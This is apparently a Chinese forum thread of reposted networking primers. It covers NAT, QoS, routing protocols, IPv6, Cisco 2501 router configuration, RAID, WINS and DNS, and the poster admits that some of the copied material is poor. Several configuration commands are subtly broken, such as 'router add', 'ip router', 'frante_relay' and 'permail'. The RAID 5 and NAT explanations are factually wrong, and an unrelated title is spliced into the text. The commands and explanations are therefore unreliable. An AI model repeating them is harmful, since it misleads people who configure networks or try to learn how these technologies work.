    如同用户登录信息一样，IP和MAC地址在网上无加密传递也很不安全。NAT可把合法IP地址和MAC地址翻译成非法IP地址和MAC地址在网上传递，到达目标路由器后反翻译成合法IP与MAC地址，这一过程有点像CHAP，翻译算法厂商各自有不同标准，不能实现互操作。
    QoS
    QoS（Quality of Service-服务质量）本来是ATM（Asynchronous Transmit Mode）中的专用术语，在IP上原来是不谈QoS的，但利用IP传VOD等多媒体信息的应用越来越多，IP作为一个打包的协议显得有点力不从心：延迟长且不为定值，丢包造成信号不连续且失真大。为解决这些问题，厂商提供了若干解决方案：第一种方案是基于不同对象的优先级，某些设备（多为多媒体应用）发送的数据包可以后到先传。第二种方案基于协议的优先级，用户可定义哪种协议优先级高，可后到先传，Intel和Cisco都支持。第三种方案是做链路整合MLPPP（Multi Link Point to Point Protocol），Cisco支持可通过将连接两点的多条线路做带宽汇聚，从而提高带宽。第四种方案是做资源预留RSVP（Resource Reservation Protocol），它将一部分带宽固定的分给多媒体信号，其它协议无论如何拥挤，也不得占用这部分带宽。这几种解决方案都能有效的提高传输质量。
    RIP、OSPF和BGP协议
    互联网上现在大量运行的路由协议有RIP（Routing Information Protocol-路由信息协议）、OSPF（Open Shortest Path First--开放式最短路优先）和BGP（Border Gateway Protocol—边界网关协议）。RIP、OSPF是内部网关协议，适用于单个ISP的统一路由协议的运行，由一个ISP运营的网络称为一个自治系统。BGP是自治系统间的路由协议，是一种外部网关协议。
    RIP是推出时间最长的路由协议，也是最简单的路由协议。它主要传递路由信息（路由表）来广播路由。每隔30秒，广播一次路由表，维护相邻路由器的关系，同时根据收到的路由表计算自己的路由表。RIP运行简单，适用于小型网络，互联网上还在部分使用着RIP。
    OSPF协议是“开放式最短路优先”的缩写。“开放”是针对当时某些厂家的“私有”路由协议而言，而正是因为协议开放性，才使得OSPF具有强大的生命力和广泛的用途。它通过传递链路状态（连接信息）来得到网络信息，维护一张网络有向拓扑图，利用最小生成树算法得到路由表。OSPF是一种相对复杂的路由协议。
    总的来说，OSPF、RIP都是自治系统内部的路由协议，适合于单一的ISP（自治系统）使用。一般说来，整个互联网并不适合跑单一的路由协议，因为各ISP有自己的利益，不愿意提供自身网络详细的路由信息。为了保证各ISP利益，标准化组织制定了ISP间的路由协议BGP。
    BGP处理各ISP之间的路由传递。其特点是有丰富的路由策略，这是RIP、OSPF等协议无法做到的，因为它们需要全局的信息计算路由表。BGP通过ISP边界的路由器加上一定的策略，选择过滤路由，把RIP、OSPF、BGP等的路由发送到对方。全局范围的、广泛的互联网是BGP处理多个ISP间的路由的实例。BGP的出现，引起了互联网的重大变革，它把多个ISP有机的连接起来，真正成为全球范围内的网络。带来的副作用是互联网的路由爆炸，现在互联网的路由大概是60000条，这还是经过“聚合”后的数字。 配置BGP需要对用户需求、网络现状和BGP协议非常了解，还需要非常小心，BGP运行在相对核心的地位，一旦出错，其造成的损失可能会很大！　　　　IPv6技术
    迅速发展中的互联网将不再是仅仅连接计算机的网络，它将发展成能同电话网、有线电视网类似的信息通信基础设施。因此，正在使用的IP（互联网协议）已经难以胜任，人们迫切希望下一代 IP即IPv6的出现。
    IPv6是IP的一种版本，在互联网通信协议TCP/IP中，是OSI模型第3层(网络层)的传输协议。它同目前广泛使用的、1974年便提出的IPv4相比，地址由32位扩充到128位。从理论上说，地址的数量由原先的4.3×109个增加到4.3×1038个。之所以必须从现行的IPv4改用IPv6，主要有二个原因。
    1．由于互联网迅速发展，地址数量已经不够用，这使得网络管理花费的精力和费用令人难以承受。地址的枯竭是促使向拥有128位地址空间过渡的首要原因。
    2．随着主机数目的增加，决定数据传输路由的路由表在不断加大。路由器的处理性能跟不上这种迅速增长。长此以往，互联网连接将难以提供稳定的服务。经由IPv6，路由数可以减少一个数量级。
    为了使互联网连接许多东西变得简单，而且使用容易，必须采用IPv6。IPv6所以能做到这一点，是因为它使用了四种技术:地址空间的扩充、可使路由表减小的地址构造、自动设定地址以及提高安全保密性。
    IPv6在路由技术上继承了IPv4的有利方面，代表未来路由技术的发展方向，许多路由器厂商目前已经投入很大力量以生产支持IPv6的路由器。当然IPv6也有一些值得注意和效率不高的地方，IPv4/NAT和IPv6将会共存相当长的一段时间。
路由器的配置与调试
路由器在计算机网络中有着举足轻重的地位，是计算机网络的桥梁。通过它不仅可以连通不同的网络，还能选择数据传送的路径，并能阻隔非法的访问。
    路由器的配置对初学者来说，并不是件十分容易的事。现将路由器的一般配置和简单调试介绍给大家，供朋友们在配置路由器时参考，本文以Cisco2501为例。
    Cisco2501有一个以太网口（AUI）、一个Console口（RJ45）、一个AUX口（RJ45）和两个同步串口，支持DTE和DCE设备，支持 EIA/TIA-232、 EIA/TIA-449、 V.35 、X.25和EIA-530接口。
    一．配置
    1．配置以太网端口
    &#35; conf t（从终端配置路由器）
    &#35; int e0（指定E0口）
    &#35; ip addr ABCD XXXX（ABCD 为以太网地址，XXXX为子网掩码）
    &#35; ip addr ABCD XXXX secondary（E0口同时支持两个地址类型。如果第一个为 A类地址，则第二个为B或C类地址）
    &#35; no shutdown（激活E0口）
    &#35; exit
    完成以上配置后，用ping命令检查E0口是否正常。如果不正常，一般是因为没有激活该端口，初学者往往容易忽视。用no shutdown命令激活E0口即可。
    2．X.25的配置
    &#35; conf t
    &#35; int S0（指定S0口）
    &#35; ip addr ABCD XXXX（ABCD 为以太网S0 的IP地址，XXXX为子网掩码）
    &#35; encap X25-ABC（封装X.25协议。ABC指定X.25为DTE或DCE操作，缺省为DTE）
    &#35; x25 addr ABCD（ABCD为S0的X.25端口地址，由邮电局提供）
    &#35; x25 map ip ABCD XXXX br（映射的X.25地址。ABCD为对方路由器（如：S0）的IP 地址，XXXX为对方路由器（如：S0）的X.25端口地址）
    &#35; x25 htc X（配置最高双向通道数。X的取值范围1-4095，要根据 邮电局实际提供的数字配置）
    &#35; x25 nvc X（配置虚电路数，X不可超过邮电局实际提供的数否则将影响数据的正常传输）
    &#35; exit
    S0端口配置完成后，用no shutdown命令激活E0口。如果ping S0端口正常，ping 映射的X.25 IP地址即对方路由器端口IP地址不通，则可能是以下几种情况引起的：1）本机X.25地址配置错误，重新与邮局核对（X.25地址长度为13位）；2）本机映射IP地址或X.25地址配置错误，重新配置正确；3）对方IP地址或X.25地址配置错误；4）本机或对方路由配置错误。
    能够与对方通讯，但有丢包现象。出现这种情况，一般有以下几种可能：1）线路情况不好，或网卡、RJ45插头接触不良；2）x25 htc最高双向通道数X的取值范围和x25nvc 虚电路数X超出邮电局实际提供的数字。最高双向通道数和虚电路数这两个值越大越好，但绝对不能超出邮电局实际提供的数字，否则就会出现丢包现象。
    3．专线的配置
    &#35; conf t
    &#35; int　S2（指定S2口）
    &#35; ip addr ABCD XXXX（ABCD 为S2 的IP地址，XXXX为子网掩码）
    &#35; exit
    专线口配置完成后，用no shutdown命令激活S2口即可。
    4．帧中继的配置
    &#35; conf t
    &#35; int s0
    &#35; ip addr ABCD XXXX （ABCD 为S0 的IP地址,XXXX为子网掩码）
    &#35; encap frante_relay （封装frante_relay 协议）
    &#35; no nrzi_encoding （NRZI=NO）
    &#35; frame_relay lmi_type q933a （LMI使用Q933A标准．LMI（Local management Interface） 有3种：ANSI：T1.617、CCITTY：Q933A和Cisco特有的标准）
    &#35; fram-relay intf-typ ABC（ABC为帧中继设备类型，它们分别是DTE设备、DCE交换机或NNI（网络接点接口）支持）
    &#35; frame_relay interface_dlci 110 br（配置DLCI（数据链路连接标识符））
    &#35; frame-relay map ip ABCD XXXX broadcast （建立帧中继映射。ABCD为对方IP地址，XXXX为本地DLCI号，broadcast允许广播向前转发或更新路由）
    &#35; no shutdown （激活本端口）
    &#35; exit
    帧中继S0端口配置完成后，用ping命令检查S0口。如果不正常，通常是因为没有激活该端口，用no shutdown命令激活S0口即可。如果ping S0端口正常，ping 映射的IP地址不正常，则可能是帧中继交换机或对方配置错误，需要综合排查。
    5．配置同步/异步口（适用于2522）
    &#35; conf t
    &#35; int s2
    &#35; ph asyn （配置S2为异步口）
    &#35; ph sync （配置S2为同步口）
    6．动态路由的配置
    &#35; conf t
    &#35; router eigrp 20 （使用EIGRP路由协议。常用的路由协议有RIP、IGRP、IS-IS等）
    &#35; passive-interface serial0 （若S0与X.25相连，则输入本条指令）
    &#35; passive-interface serial1 （若S1与X.25相连，则输入本条指令）
    &#35; network ABCD （ABCD为本机的以太网地址）
    &#35; network XXXX （XXXX为S0的IP地址）
    &#35; no auto-summary
    &#35; exit
    7．静态路由的配置
    &#35; ip router ABCD XXXX YYYY 90 （ABCD为对方路由器的以太网地址，XXXX 为子网掩码，YYYY为对方对应的广域网端口地址）
    &#35; dialer-list 1 protocol ip permail
    二． 综合调试
    当路由器全部配置完毕后，可进行一次综合调试。
    1．首先将路由器的以太网口和所有要使用的串口都激活。方法是进入该口，执行no shutdown。
    2．将和路由器相连的主机加上缺省路由（中心路由器的以太地址）。方法是在Unix系统的超级用户下执行：router add default XXXX 1（XXXX为路由器的E0口地址）。每台主机都要加缺省路由，否则，将不能正常通讯。
    3．ping本机的路由器以太网口，若不通，可能以太网口没有激活或不在一个网段上。ping广域网口，若不通，则没有加缺省路由。ping对方广域网口，若不通，路由器配置错误。ping主机以太网口，若不通，对方主机没有加缺省路由。
    4．在专线卡X.25主机上加网关（静态路由）。方法是在Unix系统的超级用户下执行：router add X.X.X.X Y.Y.Y.Y 1（X.X.X.X为对方以太网地址，Y.Y.Y.Y为对方广域网地址）。
    5．使用Tracert对路由进行跟踪，以确定不通网段。
网上抄的，有些内容太垃圾，大家自己看看吧

--------------------------------------------------------------------------------
作者: sandywg　　时间: 2003-5-3 21:11　　 标题: 还是介绍基本知识先啊！！

LBHIDDEN[0]LBHIDDEN[这个贴子最后由shgengen在 2005/03/20 09:01am 第 1 次编辑]

问：什么是网关？
——答：网关是网络连接设备的重要组成部分，它不仅具有路由的功能，而且能在两个不同的协议集之间进行转换，从而使不同的网络之间进行互联。例如：一个Net-ware局域网通过网关可以访问IBM的SNA网络，这样使用IPX协议的PC就可和SNA网络上的IBM主机进行通信。

问：什么是交换机？
——答：交换机也叫交换式集线器，它通过对信息进行重新生成，并经过内部处理后转发至指定端口，具备自动寻址能力和交换作用，由于交换机根据所传递信息包的目的地址，将每一信息包独立地从源端口送至目的端口，避免了和其他端口发生碰撞，因此，交换机可以同时互不影响的传送这些信息包，并防止传输碰撞，提高了网络的实际吞吐量。

问：什么是级联？
——答：级联是通过双绞线把需要级联的设备通过级联端口相连接，从而达到增加同一网络端口数目的方法。

问：什么是集线器？
——答：集线器是对网络进行集中管理的最小单元，它只是一个信号放大和中转的设备，不具备自动寻址能力和交换作用，由于所有传到集线器的数据均被广播到与之相连的各个端口，因而容易形成数据堵塞。

问：什么是服务器？
——答：服务器是指具有固定的地址，并为网络用户提供服务的节点，它是实现资源共享的重要组成部分，服务器主要有网络服务器、打印服务器、终端服务器、磁盘服务器和文件服务器等。

问：什么是工作站？
——答：工作站是一种高档的微型计算机，通常配有高分辨率的大屏幕显示器及容量很大的内存储器和外部存储器，并且具有较强的信息处理功能和高性能的图形、图像处理功能以及联网功能。

问：什么是MAC地址？
——答：MAC地址一般是一个12位的十六进制地址，用于标识网卡，一般来说，每块网卡的MAC地址是唯一的。

--------------------------------------------------------------------------------
作者: sandywg　　时间: 2003-5-3 21:15　　 标题: 还是介绍基本知识先啊！！

LBHIDDEN[0]LBHIDDEN[这个贴子最后由shgengen在 2005/03/20 09:01am 第 1 次编辑]

什么是独立磁盘冗余阵列(RAID)技术独立磁盘冗余阵列（RAID）是在服务器等级用于高容量数据存储的公用系统。RAID系统使用许多小容量磁盘驱动器来存储大量数据，并且使可靠性和冗余度得到增强。对计算机来说，这样一种阵列就如同由多个磁盘驱动器构成的一个逻辑单元。
RAID存储的方式多种多样。某些类型的RAID强调性能，某些则强调可靠性、容错或纠错能力。因此，可根据要完成的任务来选择类型。不过，所有的RAID系统共同的特点——也是其真正的优点则是“热交换”能力：用户可以取出一个存在缺陷的驱动器，并插入一个新的予以更换。对大多数类型的RAID来说，不必中断服务器或系统，就可以自动重建某个出现故障的磁盘上的数据。
RAID并非保护大量数据的唯一途径，但是，常规的备份和镜像软件速度较慢，而且，如果一个驱动器出现故障，则往往需要中断系统。即使磁盘不导致服务器中断，IT工作人员仍需要断掉服务器来更换驱动器。相反，RAID利用镜像或奇偶信息来从剩余的驱动器重建数据，不必中断系统。
Level0、3和5是三种最常见的RAID实施方式:
RAIDLevel0即数据分割，是最基本的方式。在一个普通硬盘驱动器上，数据被存储在同一张盘的连续扇区上。RAID0至少使用两个磁盘驱动器，并将数据分成从512字节到数兆字节的若干块，这些数据块被交替写到磁盘中。第1段被写到磁盘1中，第2段被写到磁盘2中，如此等等。当系统到达阵列中的最后一个磁盘时，就写到磁盘1的下一分段，以下如此。分割数据将I／O负载平均分配到所有的驱动器。由于驱动器可以同时写或读，性能得以显著提高。但是，它却没有数据保护能力。如果一个磁盘出故障，数据就会丢失。RAID 0不适用于关键任务环境，但是，它却非常适合于视频生产和编辑或图像编辑。
RAIDLevel3包括数据分割，另外，它还指定一个驱动器来存储奇偶信息。这就提供了某种容错功能，在数据密集型环境或单一用户环境中尤其有益于访问较长的连续记录。RAID 3需要同步主轴驱动器来预防较短记录的性能下降。
RAIDLevel5类似于Level0，但是它不是将数据分成块，而是将每个字节的位拆分到多个磁盘。这样会增加管理费用，但是，如果一个磁盘出现故障，则它可以更换，数据可以从奇偶和纠错码中重建。RAID 5包括所有的读／写运行。它需要三到五个磁盘来组成阵列，最适合于不需要关键特性或几乎不进行写操作的多用户系统。
其它不常见的RAID类型:
RAIDLevel1是磁盘镜像——写到磁盘1中的一切也写到磁盘2中，从任何一个磁盘都可以读取。这样就提供了即时备份，但需要的磁盘驱动器数量最多，不能提高性能。RAID 1在多用户系统中提供最佳性能和容错能力，是最容易实施的配置，这最适用于财务处理、工资单、金融和高可用数据环境。
RAIDLevel2是为大型机和超级计算机开发的。它可在工作不中断的情况下纠正数据，但是，RAID2倾向于较高的数据校验和纠错率。
RAIDLevel4包括较大的数据条，这样，就可以从任何驱动器读取记录。由于这种类型缺乏对多种同时写操作的支持，因而，几乎不使用。
RAIDLevel6几乎没有进行商用。它使用一种分配在不同的驱动器上的第二种奇偶方案，扩展了RAID5。它能承受多个驱动器同时出现故障，但是，性能——尤其是写操作却很差，而且，系统需要一个极为复杂的控制器。
RAIDLevel7有一个实时嵌入操作系统用作控制器，一个高速总线用于缓存。它提供快速的I／O，但是价格昂贵。
RAIDLevel10由数据条阵列组成，其中，每个条都是驱动器的一个RAID1阵列。它与RAID1的容错能力相同，面向需要高性能和冗余，但不需要高容量的数据库服务器。
RAIDLevel53是最新的一种类型，实施情况同Level0数据条阵列，其中，每一段都是一个RAID3阵列。它的冗余与容错能力同RAID3。这对需要具有高数据传输率的RAID 3配置的IT系统有益，但是它价格昂贵、效率偏低.

--------------------------------------------------------------------------------
作者: sandywg　　时间: 2003-5-3 21:18　　 标题: 还是介绍基本知识先啊！！

WINS服务
WINS是Windows Internet Name Server（Windows网际名字服务）的简称。WINS为NetBIOS名字提供名字注册、更新、释放和转换服务，这些服务允许WINS服务器维护一个将NetBIOS名链接到IP地址的动态数据库，大大减轻了对网络交通的负担。
一.我们为什么需要WINS服务
在默认状态中，网络上的每一台计算机的NetBIOS名字是通过广播的方式来提供更新的，也就是说，假如网络上有n台计算机，那么每一台计算机就要广播n-1次，对于小型网络来说，这似乎并不影响网络交通，但是当大型网络来说，加重了网络的负担。因此WINS对大中型企业来说尤其重要。
二.WINS工作原理
上面说过，WINS服务器为客户端提供名字注册了、更新、释放和转换服务，下面就详细介绍这四个基本服务的工作原理：
1.名字注册
名字注册就是客户端从WINS服务器获得信息的过程，在WINS服务中，名字注册是动态的。
当一个客户端启动时，它向所配置的WINS服务器发送一个名字注册信息（包括了客户机的IP地址和计算机名），如果WINS服务器正在运行，并且没有没有其它客户计算机注册了相同的名字，服务器就向客户端计算机返还一个成功注册的消息（包括了名字注册的存活期----TTL）。
与IP地址一样，每个计算机都要求有唯一的计算机名，否则就无法通信。如果名字已经被其它计算机注册了，WINS服务将会验证该名字是否正在使用。如果该名字正在使用则注册失败（发回一个负确认的信息），否则就可以继续注册。
2.名字更新
因为客户端被分配了一个TTL（存活期），所有它的注册也有一定的期限，过了这个期限，WINS服务器将从数据库中删除这个名字的注册信息。它的过程是这样的：
（1）.在过了存活期的1/8后，客户端开始不断试图更新它的名字注册，如果收到不到任何响应,WINS客户端每过2分钟重复更新浓度，直到存活期过了一半。
（2）.当存活期过了一半时，WINS客户端将尝试与次选WINS服务器更新它的租约，它的过程与首选WINS服务器一样。
（3）.如果时间过了一半后仍然没有成功的话，该客户端又回到它的首选WINS服务器了。
在该过程中，不管是与首选还是次选WINS服务器，一旦名字注册成功之后，该WINS客户端的名字注册将被提供一个新的TTL值。
WINS服务介绍（二）
3.名字释放
在客户端的正常关机过程中，WINS客户端向WINS服务器发送一个名字释放的请求，以请求释放其映射在WINS服务器数据库中的IP地址和NetBIOS名字。收到释放请求后，WINS服务器验证一下在它的数据库中是否有该IP地址和NetBIOS名，如果有就可以正常释放了，否则就会出现错误（WINS服务器向WINS客户端发送一个负响应）。
如果计算机没有正常关闭，WINS服务器将不知道其名字已经释放了，则该名字将不会失效，直到WINS名字注册记录过期。
4.名字解析
当客户端在许多网络操作中需要WINS服务器解析名字，例如当使用网络上其它计算机的共享文件时，为了得到共享文件，用户需要指定两件事：系统名和共享名，而系统名就需要转换成IP地址。
名字解析过程是这样的：
（1）.当客户端计算机想要转换一个名字时，它首先检查本地NetBIOS名字缓存器。
（2）.如果名字不在本地NetBIOS名字缓存器中，便发送一个名字查询到首选WINS服务器（每隔15秒发送一次，共发三次），如果请求失败，则向次选WINS发送同样的请求。
（3）.如果都失败了，那么名字解析可以通过其它途径来转换（例如本地广播、lmhosts文件和hosts文件、或者DNS来进行名字解析。
三.WINS服务器和客户端的需求
1.Microsoft对服务器的需求
（1）.至少提供一个首选WINS服务器和一个次选WINS服务器来提供容错功能。
（2）.一个WINS服务器每分钟可以处理近1500个名字注册和约4500个名字查询。因此我们强烈建议你一个首选和一个次选WINS服务器可以带动10000个客户端。
（3）.如果WINS服务器与客户机不在同一个子网上，就要考虑到路由器的性能了。
2.客户端的需求
几乎所有的支持网络互联的Microsoft客户端都可以是WINS客户端，下面列出了可以与WINS一起工作的客户端：
*Windows NT Server 3.5x,4.0
*Windows NT Workstation 3.5x,4.0
*Windows 9x/me/2000
*Windows for Workgroups with TCP/IP-32
*Microsoft Network Client 3.0 for MS-DOS
*LAN Manager 2.2c for MS-DOS
基于DOS的客户端也可以用WINS服务器进行名字解析，但你必须为它们在WINS服务器中添加静态词条。

--------------------------------------------------------------------------------
作者: sandywg　　时间: 2003-5-3 21:25　　 标题: 还是介绍基本知识先啊！！

问：什么是“DNS”？其中文为何？
答：DNS，简单地说，就是Domain Name System，翻成中文就是“域名系统”。

问：DNS有什么用途？
答：在一个TCP/IP架构的网络（例如Internet）环境中，DNS是一个非常重要而且常用的系统。主要的功能就是将人易于记忆的Domain Name与人不容易记忆的IP Address作转换。而上面执行DNS服务的这台网络主机，就可以称之为DNS Server。基本上，通常我们都认为DNS只是将Domain Name转换成IP Address，然后再使用所查到的IP Address去连接（俗称“正向解析”）。事实上，将IP Address转换成Domain Name的功能也是相当常使用到的，当login到一台Unix工作站时，工作站就会去做反查，找出你是从哪个地方连线进来的（俗称“逆向解析”）。

问：DNS是怎么运作的？
答：DNS是使用层的方式来运作的。例如：哈工大紫丁香站的Domain Name为bbs.hit.edu.cn，这个Domain Name当然不是凭空而来的，是从.edu.cn所分配下来的。.edu.cn又是从.cn授予（delegation）的。.cn是从哪里来的呢？答案是从“.”，也就是所谓的“根域”（root domain）来的。根领域已经是Domain Name的最上层。而“.”这层是由InterNIC（Internet Network InFORMation Center，互联网信息中心）所管理。全世界的Domain Name就是这样，一层一层的授予下来。

问：当我查一个Domain Name时，DNS是怎么查出它的IP的呢？
答：举个例子，假设今天我们查的Domain Name（作一个dns query）为bbs.hit.edu.cn时，DNS Server会这么处理：
(1)你所用的电脑（可能是PC，也可能是工作站）送出一个问题给这台电脑所设定的DNS Server，提问：bbs.hit.edu.cn的IP是什么？
(2)这台DNS会先看看是不是在它的cache中，如果是，就丢出答案。如果不是，就从最上头查起。在DNS Server上面一定有设定“.”要跟谁问。所以，这个时候它就往“.”层的任何一台DNS（目前“.”有13台）问：.cn要问谁？
(3)“.”层的DNS会回答.cn要向谁查（同时你用的DNS会cache起来这个答案）。
(4)接下来你所用的DNS就会向.cn这层的DNS问：.edu.cn要问谁？
(5).cn的这层就会回答.edu.cn要向谁查（同时你用的DNS也把这答案cache起来）。
(6)直到bbs.hit.edu.cn回答：bbs.hit.edu.cn的IP是202.118.224.2（又cache起来）。

经过了这么多的过程，终于得到了这个IP，接下来才能作进一步的连线。要注意的是，在每一层都会问一个问题，并且把答案记下来（cache起），而且还会忘掉（看该层的设定是要cache多久）。

问：DNS要怎么设置？
答：如果，只是要使用DNS，那只要在TCP/IP的网络属性中设置即可。设置的方法跟使用的操作系统有关。例如：Windows 9x在“控制面板”→“网络”→“TCP/IP”→“属性”中，找到DNS的部分再来设置。Unix在/etc/resolv.conf这个文件中设置（如果，要架设一台DNS Server，就不是在这里讨论的了）。

问：哪一台DNS资料最新？
答：如果你知道DNS是利用阶层架构运作的，那就应该知道，离你最近的DNS，就是最好的


路由器基础知识（一）

《一键清理系统垃圾》

路由器基础知识（一）

出处：网络转载

路由器是一种连接多个网络或网段的网络设备，它能将不同网络或网段之间的数据信息进行“翻译”，以使它们能够相互“读”懂对方的数据，从而构成一个更大的网络。

路由器有两大典型功能，即数据通道功能和控制功能。数据通道功能包括转发决定、背板转发以及输出链路调度等，一般由特定的硬件来完成；控制功能一般用软件来实现，包括与相邻路由器之间的信息交换、系统配置、系统管理等。

多少年来，路由器的发展有起有伏。90年代中期，传统路由器成为制约因特网发展的瓶颈。ATM交换机取而代之，成为IP骨干网的核心，路由器变成了配角。进入90年代末期，Internet规模进一步扩大，流量每半年翻一番，ATM网又成为瓶颈，路由器东山再起，Gbps路由交换机在1997年面世后，人们又开始以Gbps路由交换机取代ATM交换机，架构以路由器为核心的骨干网。

路由器原理及路由协议

1 网络互连

把自己的网络同其它的网络互连起来，从网络中获取更多的信息和向网络发布自己的消息，是网络互连的最主要的动力。网络的互连有多种方式，其中使用最多的是网桥互连和路由器互连。

1.1 网桥互连的网络

网桥工作在OSI模型中的第二层，即链路层。完成数据帧（frame）的转发，主要目的是在连接的网络间提供透明的通信。网桥的转发是依据数据帧中的源地址和目的地址来判断一个帧是否应转发和转发到哪个端口。帧中的地址称为“MAC”地址或“硬件”地址，一般就是网卡所带的地址。

网桥的作用是把两个或多个网络互连起来，提供透明的通信。网络上的设备看不到网桥的存在，设备之间的通信就如同在一个网上一样方便。由于网桥是在数据帧上进行转发的，因此只能连接相同或相似的网络（相同或相似结构的数据帧），如以太网之间、以太网与令牌环（token ring）之间的互连，对于不同类型的网络（数据帧结构不同），如以太网与X.25之间，网桥就无能为力了。

网桥扩大了网络的规模，提高了网络的性能，给网络应用带来了方便，在以前的网络中，网桥的应用较为广泛。但网桥互连也带来了不少问题：一个是广播风暴，网桥不阻挡网络中广播消息，当网络的规模较大时（几个网桥，多个以太网段），有可能引起广播风暴（broadcasting storm），导致整个网络全被广播信息充满，直至完全瘫痪。第二个问题是，当与外部网络互连时，网桥会把内部和外部网络合二为一，成为一个网，双方都自动向对方完全开放自己的网络资源。这种互连方式在与外部网络互连时显然是难以接受的。问题的主要根源是网桥只是最大限度地把网络沟通，而不管传送的信息是什么。

1.2 路由器互连网络

路由器互连与网络的协议有关，我们讨论限于TCP／IP网络的情况。

路由器工作在OSI模型中的第三层，即网络层。路由器利用网络层定义的“逻辑”上的网络地（即IP地址）来区别不同的网络，实现网络的互连和隔离，保持各个网络的独立性。路由器不转发广播消息，而把广播消息限制在各自的网络内部。发送到其他网络的数据茵先被送到路由器，再由路由器转发出去。

IP路由器只转发IP分组，把其余的部分挡在网内（包括广播），从而保持各个网络具有相对的独立性，这样可以组成具有许多网络（子网）互连的大型的网络。由于是在网络层的互连，路由器可方便地连接不同类型的网络，只要网络层运行的是IP协议，通过路由器就可互连起来。

网络中的设备用它们的网络地址（TCP／IP网络中为IP地址）互相通信。IP地址是与硬件地址无关的“逻辑”地址。路由器只根据IP地址来转发数据。IP地址的结构有两部分，一部分定义网络号，另一部分定义网络内的主机号。目前，在Internet网络中采用子网掩码来确定IP地址中网络地址和主机地址。子网掩码与IP地址一样也是32bit，并且两者是一一对应的，并规定，子网掩码中数字为“1”所对应的IP地址中的部分为网络号，为“0”所对应的则为主机号。网络号和主机号合起来，才构成一个完整的IP地址。同一个网络中的主机IP地址，其网络号必须是相同的，这个网络称为IP子网。

通信只能在具有相同网络号的IP地址之间进行，要与其它IP子网的主机进行通信，则必须经过同一网络上的某个路由器或网关（gateway）出去。不同网络号的IP地址不能直接通信，即使它们接在一起，也不能通信。

路由器有多个端口，用于连接多个IP子网。每个端口的IP地址的网络号要求与所连接的IP子网的网络号相同。不同的端口为不同的网络号，对应不同的IP子网，这样才能使各子网中的主机通过自己子网的IP地址把要求出去的IP分组送到路由器上。

2 路由原理

当IP子网中的一台主机发送IP分组给同一IP子网的另一台主机时，它将直接把IP分组送到网络上，对方就能收到。而要送给不同IP于网上的主机时，它要选择一个能到达目的子网上的路由器，把IP分组送给该路由器，由路由器负责把IP分组送到目的地。如果没有找到这样的路由器，主机就把IP分组送给一个称为“缺省网关（default gateway）”的路由器上。“缺省网关”是每台主机上的一个配置参数，它是接在同一个网络上的某个路由器端口的IP地址。

路由器转发IP分组时，只根据IP分组目的IP地址的网络号部分，选择合适的端口，把IP分组送出去。同主机一样，路由器也要判定端口所接的是否是目的子网，如果是，就直接把分组通过端口送到网络上，否则，也要选择下一个路由器来传送分组。路由器也有它的缺省网关，用来传送不知道往哪儿送的IP分组。这样，通过路由器把知道如何传送的IP分组正确转发出去，不知道的IP分组送给“缺省网关”路由器，这样一级级地传送，IP分组最终将送到目的地，送不到目的地的IP分组则被网络丢弃了。

——目前TCP／IP网络，全部是通过路由器互连起来的，Internet就是成千上万个IP子网通过路由器互连起来的国际性网络。这种网络称为以路由器为基础的网络（router based network），形成了以路由器为节点的“网间网”。在“网间网”中，路由器不仅负责对IP分组的转发，还要负责与别的路由器进行联络，共同确定“网间网”的路由选择和维护路由表。

——路由动作包括两项基本内容：寻径和转发。寻径即判定到达目的地的最佳路径，由路由选择算法来实现。由于涉及到不同的路由选择协议和路由选择算法，要相对复杂一些。为了判定最佳路径，路由选择算法必须启动并维护包含路由信息的路由表，其中路由信息依赖于所用的路由选择算法而不尽相同。路由选择算法将收集到的不同信息填入路由表中，根据路由表可将目的网络与下一站（nexthop）的关系告诉路由器。路由器间互通信息进行路由更新，更新维护路由表使之正确反映网络的拓扑变化，并由路由器根据量度来决定最佳路径。这就是路由选择协议（routing protocol），例如路由信息协议（RIP）、开放式最短路径优先协议（OSPF）和边界网关协议（BGP）等。

——转发即沿寻径好的最佳路径传送信息分组。路由器首先在路由表中查找，判明是否知道如何将分组发送到下一个站点（路由器或主机），如果路由器不知道如何发送分组，通常将该分组丢弃；否则就根据路由表的相应表项将分组发送到下一个站点，如果目的网络直接与路由器相连，路由器就把分组直接送到相应的端口上。这就是路由转发协议（routed protocol）。

——路由转发协议和路由选择协议是相互配合又相互独立的概念，前者使用后者维护的路由表，同时后者要利用前者提供的功能来发布路由协议数据分组。下文中提到的路由协议，除非特别说明，都是指路由选择协议，这也是普遍的习惯。

3。 路由协议

——典型的路由选择方式有两种：静态路由和动态路由。

——静态路由是在路由器中设置的固定的路由表。除非网络管理员干预，否则静态路由不会发生变化。由于静态路由不能对网络的改变作出反映，一般用于网络规模不大、拓扑结构固定的网络中。静态路由的优点是简单、高效、可靠。在所有的路由中，静态路由优先级最高。当动态路由与静态路由发生冲突时，以静态路由为准。

——动态路由是网络中的路由器之间相互通信，传递路由信息，利用收到的路由信息更新路由器表的过程。它能实时地适应网络结构的变化。如果路由更新信息表明发生了网络变化，路由选择软件就会重新计算路由，并发出新的路由更新信息。这些信息通过各个网络，引起各路由器重新启动其路由算法，并更新各自的路由表以动态地反映网络拓扑变化。动态路由适用于网络规模大、网络拓扑复杂的网络。当然，各种动态路由协议会不同程度地占用网络带宽和CPU资源。

——静态路由和动态路由有各自的特点和适用范围，因此在网络中动态路由通常作为静态路由的补充。当一个分组在路由器中进行寻径时，路由器首先查找静态路由，如果查到则根据相应的静态路由转发分组；否则再查找动态路由。

——根据是否在一个自治域内部使用，动态路由协议分为内部网关协议（IGP）和外部网关协议（EGP）。这里的自治域指一个具有统一管理机构、统一路由策略的网络。自治域内部采用的路由选择协议称为内部网关协议，常用的有RIP、OSPF；外部网关协议主要用于多个自治域之间的路由选择，常用的是BGP和BGP-4。下面分别进行简要介绍。

3.1 RIP路由协议

——RIP协议最初是为Xerox网络系统的Xerox parc通用协议而设计的，是Internet中常用的路由协议。RIP采用距离向量算法，即路由器根据距离选择路由，所以也称为距离向量协议。路由器收集所有可到达目的地的不同路径，并且保存有关到达每个目的地的最少站点数的路径信息，除到达目的地的最佳路径外，任何其它信息均予以丢弃。同时路由器也把所收集的路由信息用RIP协议通知相邻的其它路由器。这样，正确的路由信息逐渐扩散到了全网。

——RIP使用非常广泛，它简单、可靠，便于配置。但是RIP只适用于小型的同构网络，因为它允许的最大站点数为15，任何超过15个站点的目的地均被标记为不可达。而且RIP每隔30s一次的路由信息广播也是造成网络的广播风暴的重要原因之一。

3.2 OSPF路由协议

